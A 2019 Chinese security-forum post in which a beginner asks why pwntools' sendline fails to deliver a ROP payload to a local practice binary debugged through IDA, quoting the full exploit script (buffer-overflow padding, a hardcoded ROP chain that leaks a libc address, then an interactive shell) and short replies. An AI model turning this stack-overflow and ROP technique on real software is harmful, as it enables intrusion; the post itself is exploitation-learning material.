-
-
关于pwn初学遇到的几个点
-
发表于: 2019-4-11 16:53
-
一、先上图
学习参考看雪一篇文章:50fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9K6c8W2)9#2k6W2)9#2k6X3u0A6P5W2)9K6c8p5#2B7e0e0g2z5g2r3x3J5e0f1c8k6P5p5#2%4i4K6t1#2x3@1c8Q4x3U0f1K6c8q4)9J5y4X3q4E0M7q4)9K6b7X3y4Z5K9%4y4E0i4K6y4p5j5U0p5^5x3h3u0V1x3$3x3^5y4X3j5$3x3K6b7J5j5e0y4U0y4U0m8T1y4o6W2S2y4r3b7^5x3U0x3#2y4$3t1K6j5X3y4V1z5o6x3J5z5r3u0T1x3K6M7&6x3h3f1J5k6U0M7J5z5h3p5K6k6e0x3K6k6r3u0W2j5K6V1^5j5h3j5H3j5X3t1&6x3o6k6X3x3o6W2W2y4#2)9J5y4X3q4E0M7q4)9K6b7X3W2V1P5q4)9K6c8o6q4Q4x3U0k6S2L8i4m8Q4x3@1u0E0K9h3c8Q4x3@1b7J5y4o6f1^5x3U0V1I4y4U0x3^5i4K6t1$3j5h3#2H3i4K6y4n7M7$3y4W2L8X3g2Q4x3@1b7J5x3g2)9J5y4X3q4E0M7q4)9K6b7Y4y4F1i4K6y4p5y4K6u0X3y4e0k6U0k6e0u0V1j5h3c8T1x3$3t1&6x3h3k6X3k6o6M7I4x3h3g2V1x3o6y4X3j5e0y4S2x3o6p5`.
问题一:大佬们都用过,琐碎得不做咯嗦。调用sendline(rop)的时候出现了问题,(pdb):n 本该可以发送
payload到IDA调试_gets接收,可是_gets一直没有反应,必须把输出的字符串手动拷贝到linxu_server64中回车,_gets才有了反应,如下所示:
payload就可以发送成功......,环境的话是windows10(x64)调试Centos7(x64)下的rop,不知道为什么调用sendline发送payload传输到rop会失败呢?gets接收不到呢?rexp.py源码如下,按照文章中的编写的:
#!/usr/bin/env python
from pwn import *
import pdb
context.log_level = 'debug'
target = process('./rop')
elf = ELF('./rop')
# print(hex(print_got_addr))
rop='a' * 72
rop+=p64(0x40075a)
rop+=p64(0x0)
rop+=p64(0x1)
rop+=p64(0x600111)
rop+=p64(0x400784)
rop+=p64(0x400740)
rop+=p64(0x0)*7
rop+=p64(0x400656)
pdb.set_trace()
target.sendline(rop)
target.recvuntil(':')
target.recvuntil(':')
addr=target.recvline()[:-1]
addr=u64(addr+'\x00'(8-len(addr)))
print 'printfs addr is:'
target.interactive()
感谢!
|
|
|---|---|
|
|
|
|
|
\n是指那一块加上\n? sendline默认是+\n的
最后于 2019-4-11 19:54
被一半人生编辑
,原因:
|
|
|
|
|
|
|
|
|
我是手动执行到_gets,然后F9.,然后在执行send发送,_gets等待接收 问题二已解决 , 找到了获取方式... elf.got['xxx']
最后于 2019-4-11 19:47
被一半人生编辑
,原因:
|
|
|
|
|
|
应该是 研究不太深 还在学习中 只不过sendline(payload)这个问题没有找了相关资料参考,找不到问题所在...... 配置环境好像也没问题 |
|
|
|
